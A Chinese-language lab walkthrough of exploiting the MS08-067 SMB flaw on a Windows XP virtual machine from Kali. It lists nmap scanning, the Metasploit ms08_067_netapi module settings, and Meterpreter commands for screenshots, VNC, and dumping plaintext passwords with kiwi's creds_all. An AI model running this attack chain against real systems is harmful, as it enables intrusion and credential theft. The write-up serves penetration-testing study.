一、实验环境

1
2
3
攻击机(kali):192.168.189.142

靶机(windows xp): 192.168.189.147

二、漏洞发现

1、使用nmap扫描靶机发现存在ms08-067漏洞

1
nmap --script smb-vuln* 192.168.189.147

image-20220323153855876

三、漏洞利用

1、kali中开启msfconsole,搜索ms08-067

1
2
search ms08-067
use exploit/windows/smb/ms08_067_netapi

image-20220323154617765

1
show options

image-20220323154736025

2、指定目标靶机地址

1
set rhosts 192.168.189.147

image-20220323154905150

3、选择攻击模块

1
show targets

image-20220323155011465

1
set target 34

image-20220323155044728

再次查看我们的配置

image-20220323155118955

4、开始攻击,成功获得system权限

image-20220323155246723

5、得目标系统的屏幕截图

1
screenshot

image-20220323160008392

image-20220323160059641

6、远程桌面

1
run vnc

image-20220323160445341

image-20220323160347940

7、获取密码,登录远程桌面

1
load kiwi     加载kiwi模块

image-20220323161035942

1
creds_all     列举系统中的明文密码

image-20220323161233673

8、登录远程桌面

image-20220323161459656

image-20220323161512049